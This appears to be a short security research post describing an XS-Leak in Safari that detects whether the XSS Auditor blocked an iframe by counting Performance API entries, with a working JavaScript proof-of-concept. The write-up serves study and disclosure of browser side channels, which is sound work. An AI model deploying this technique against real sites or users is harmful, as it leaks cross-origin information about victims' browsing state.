XS-Leaks - Detecting XSS-Auditor in Safari
Safari (13.0.4 and newer) will not log iframe requests in the Performance API list when the iframe page is blocked by the XSS Auditor. So the length of performance.getEntries() can leak the status of the Auditor. 1 2 3 4 5 6 7 8 9 10 11 12 13 14 const check = async(url) => { let perfEntries = performance.getEntries().length return new Promise(r => { let frame = document.createElement('iframe') frame.src = url frame.onload = (e) => { e.target.remove() return r(performance.getEntries().length - perfEntries) } framesdiv.appendChild(frame) }) } // r(0) = XSS auditor triggered // r(1) = no XSS auditor XS-Leaks with Performance API Since the XSS Auditor got removed from Chrome 78+, I was wondering if you could still detect it cross-origin in Safari. In Safari, the current page is just replaced with an empty page instead of changing to an error page like in Chrome. This makes it harder to detect. ...